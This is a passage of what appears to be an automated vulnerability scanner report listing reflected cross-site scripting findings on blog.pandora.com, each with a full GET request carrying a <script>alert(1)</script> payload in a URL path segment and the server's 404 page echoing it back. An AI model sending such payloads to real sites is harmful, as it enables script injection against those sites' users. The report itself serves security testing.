Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69a72<script>alert(1)</script>b4e2002f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1a34<script>alert(1)</script>3e603248071 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef2f7<script>alert(1)</script>b77f6aa2ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 685f7<script>alert(1)</script>b71e5ef0a26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce64<script>alert(1)</script>e78182be82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e4b2<script>alert(1)</script>1ff330e9b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a15c<script>alert(1)</script>5c048a41cfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8089c<script>alert(1)</script>6c11535c8eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7be86<script>alert(1)</script>858dc5f1838 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9cdec<script>alert(1)</script>3afc3bd0abd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6330d<script>alert(1)</script>5cbccb3c131 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e242<script>alert(1)</script>c3f15fa67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89b64<script>alert(1)</script>b2d3b4a18a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7feb3<script>alert(1)</script>350dc8da11b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4d46<script>alert(1)</script>419734980f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d541<script>alert(1)</script>2442df8266b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a4a2<script>alert(1)</script>ff59d7e80db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 714ce<script>alert(1)</script>bf225eb4a1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92265<script>alert(1)</script>2c48c4d86bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa04<script>alert(1)</script>a909529678b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
